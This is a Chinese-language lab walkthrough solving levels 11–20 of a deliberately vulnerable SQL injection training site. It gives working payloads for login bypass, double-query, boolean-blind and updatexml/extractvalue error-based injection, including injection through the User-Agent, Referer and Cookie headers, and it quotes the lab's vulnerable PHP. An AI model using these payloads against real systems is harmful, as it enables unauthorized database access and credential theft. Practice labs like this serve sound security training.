第十一关:
看到登录框,先使用弱口令进行尝试,登录成功
输入单引号尝试引起报错
猜测后台语句为:
select * from where username=‘username’ and password=’$password’
接下来使用布尔注入,这里使用or 1=1永真句可以将所有查找结果输出
判断列数
成功查找到信息
第十二关
输入单引号没有引起报错,尝试输入双引号,报错信息很多,直接看到了后台的语句
这里根据报错信息,使用双引号加括号闭合
第十三关
通过报错信息可以构造如下的闭合方式
这一关同样是只有正确和错误两种显示,没有数据回显,所以联想到第五关的双查询注入,构造如下payload
uname=1&passwd=1’) union select count(),concat(’’,(select database()),’*’,floor(rand(0)*2))a from information_schema.columns group by a #
第十四关
1.加单引号,正常,加双引号,报错,可知为双引号闭合。
2.应该不会直接是联合查询了,一试,果然还是双查询注入。
3.构造:" 构造语句 # 构造语句和less-13一样。
第十五关
1.加单引号,只有“报错”,应该是要盲注,而且只能布尔型或时间型了(只知道错了没压根不知道错的信息)
2.不管,先把注入句式试出来,用万能句型’ or 1=1 or ‘1’=‘2,经过尝试,为单引号闭合,此时登录成功。
3.开始布尔型盲注:构造’ or 1=(if(substr(version(),1,1)=5,1,0)) or ‘1’='2,其实就是把上面的1=1改成我们想要的语句,即先看看数据库版面是否为5。因为显示登录成功,所以说明1=(if(substr(version(),1,1)=5,1,0))为true。
4.继续构造:都是把构造好的语句替换1=1,从而查看结果。构造和Less-6差不多,不再赘述。
第十六关
1.还是用万能句型试,最终试出为双引号加括号闭合,即使用") or 1=1 or “1”=(“2登录成功。
2.接下来的构造和Less-15一样,如”) or 1=(if(substr(version(),1,1)=5,1,0)) or ‘1’=("2。
第十七关
1.进入页面提示为PASSWORD RESET,即重置密码界面,坑比较多。
2.首先,在user name中尝试了多次,都是让走开,后来一想,确实该走,都提示为重置密码了,还傻傻地在user name试,应该在new password中想办法。后来看了其他大佬的博客后,查看源码才知道原来对user name表单进行了过滤:
// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
//making sure uname is not injectable
$uname=check_input($_POST['uname']);
$passwd=$_POST['passwd'];
function check_input($value)
{
if(!empty($value))
{
// truncation (see comments)
$value = substr($value,0,15);
}
// Stripslashes if magic quotes enabled
if (get_magic_quotes_gpc())
{
$value = stripslashes($value);
}
// Quote if not a number
if (!ctype_digit($value))
{
$value = "'" . mysql_real_escape_string($value) . "'";
}
else
{
$value = intval($value);
}
return $value;
函数check_input()的作用就是检查用户输入,并将用户输入安全化,其中的mysql_real_escape_string()会在\x00, \n, \r, , ', " and \x1a这些字符前加入反斜线进行转义,防止注入,而且这个函数也避免了宽字节注入的危险。
3.当然,还不止,new password也不是和之前一样轻易试出注入类型,因为有user name的限制,如果new password不对,那么怎么试都自然是错的。因为看了大佬的解题思路,知道了为单引号闭合,SQL语句为:@$sql=“SELECT username, password FROM users WHERE username= $uname LIMIT 0,1”; u p d a t e = " U P D A T E u s e r s S E T p a s s w o r d = ′ update="UPDATE users SET password = ' update="UPDATEusersSETpassword=′passwd’ WHERE username=’$row1’";且知道有用户名为admin(这个用户名一般都有)。所以就直接考虑构造了。
4.首先考虑到不能回显有意义的信息,所以首选前面一直用的双注入查询 构造如下:user name:填admin ,而new password:填’ and (select 1 from (select count(*),concat((select concat(schema_name,’;’) from information_schema.schemata limit 0,1),floor(rand()*2)) as x from information_schema.tables group by x) as a)#
剩下的构造不多说,和Less-13一样,一个一个爆就好。
5.在这里,尝试使用一种新的注入方法,基于extractvalue()和updatexml()的报错注入,详情请看: 学习基于extractvalue()和updatexml()的报错注入,同时,下面的注入丢默认user name:填admin
6.先使用updatexml()进行注入,构造为’ and updatexml(1,concat(’~’,(select version())),1)# 获取相应版本:
获取数据库名称:’ and updatexml(1,concat(’~’,(select database())),1)#
获取表名:’ and updatexml(1,concat(’~’,(select concat(table_name,’;’) from information_schema.tables where table_schema=‘security’ limit 0,1)),1)#
改变limit n,1即可获取其他表名。
获取列名:’ and updatexml(1,concat(’~’,(select concat(column_name,’;’) from information_schema.columns where table_name=‘emails’ limit 0,1)),1)#
同样,改变limit n,1即可。
获取内容:这样,不行’ and updatexml(1,concat(’~’,(select concat(username,’;’,password) from information_schema.tables where table_name=‘security’ limit 0,1)),1)# 报错如下:
这样:也不行’ and updatexml(1,concat(’~’,(select concat(username,’;’,password) from security.users limit 0,1)),1)# 报错如下:
这样:发现可以了,但是password成了0,一下子把所有的用户密码都改成了0,后面的可能就有问题了。’ or (select 1 from (select count(*),concat((select concat(username,’: ‘,password,’;’) from security.users limit 0,1),floor(rand()*2)) as x from security.users group by x) as a)#
7.使用extractvalue(),和updatexml()十分相似,用法也差不多,甚至看起来跟直观些。构造:’ and extractvalue(1,concat(’~’,(select version())))#
剩下的语句和 updatexml() 的类似。
第十八关
1.进入后显示Your IP ADDRESS is: ::1,输入常用的注入尝试,都只显示:看来和上一题一样,都进行了相关的过滤。
2.实在不懂,先看一下源码:
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
$uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);
这次对两个表单都进行过滤了。
$sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
$result1 = mysql_query($sql);
$row1 = mysql_fetch_array($result1);
if($row1)
{
echo '<font color= "#FFFF00" font size = 3 >';
$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
mysql_query($insert);
//echo 'Your IP ADDRESS is: ' .$IP;
echo "</font>";
//echo "<br>";
echo '<font color= "#0000ff" font size = 3 >';
echo 'Your User Agent is: ' .$uagent;
echo "</font>";
echo "<br>";
print_r(mysql_error());
echo "<br><br>";
echo '<img src="../images/flag.jpg" />';
echo "<br>";
}
else
{
echo '<font color= "#0000ff" font size="3">';
//echo "Try again looser";
print_r(mysql_error());
echo "</br>";
echo "</br>";
echo '<img src="../images/slap.jpg" />';
echo "</font>";
}
看到只有用户再登陆成功后才会显示用户的user agent,并且将uagent, ip_address, username插入到了uagents表中。查看一下:
注意到:
$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
在插入过程中并没有进行过滤,由此可知,可以从uagent下手。本来ip_address也可以成功的,但是源码中显示被注释掉了,回显的只能是用户的user agent
3.构造uagent的内容,使用BurpSuite对提交内容进行抓包,然后再修改相应的User-Agent:
4.易知,只要保证User-Agent:字段内容,即uagent保持单引号闭合,且使用双查询注入或使用extractvalue()或updatexml()构造相应语句即可(因为是在插入语句中,只能通过报错获取我们想要的信息)。
5.构造语句查询数据库名:
构造一:’ and updatexml(1,concat(’~’,(select database())),1) and ‘1’=‘1
构造二:’ and extractvalue(1,concat(’~’,(select database()))) and ‘1’=‘1
构造三:’ and (select 1 from (select count(*),concat(database(),’;’,floor(rand()*2)) as x from information_schema.tables group by x)as a) and ‘1’='1
6.其他构造和之前的相似,不再赘述。
第十九关
提示为Referer,直接用我们知道的用户名密码都为:admin的进行尝试,发现:
2.也就是说我们需要将构造语句放入Referer: 尝试:’ and extractvalue(1,concat(’~’,(select database()))) and ‘1’='1
第二十关
什么是cookie:
cookie是服务器给客户端的一种加密凭证,通常由客户端存储在本地,比如客户A访问 XXXX.com,网页给了客户A一个123的凭证,客户B也去访问那个网址,网站给B一个456的凭证,以后A和B去访问那个网站的时候只要加上了那个凭证网站就可以把两个人分开了。
cookie注入:
在一些网站的开发中,有的程序员为了方便会写这样的代码
ID = Request(‘id’);
而request会接受来自GET,POST,COOKIE的参数而我们有时候就会忽略对于cookie的过滤
输入admin admin 进行登陆,看到返回的页面中提到了cookie的信息,使用bp改包
修改cookie的值
先加一个单引号引起报错说明这里存在注入点,判断列数为3
由于这里没有回显信息所以使用报错注入,参考前面的报错注入语句
这里再介绍一个语句 extractvalue(1,concat(0x7e,(select @@version),0x7e))
https://www.cnblogs.com/xishaonian/p/6250444.html
1.提示为Cookie,直接用我们知道的用户名密码都为:admin的进行尝试,发现:
2.Cookie为:uname = admin 所以构造:uname=admin’ and extractvalue(1,concat(’~’,(select database()))) #3.构造还是一样的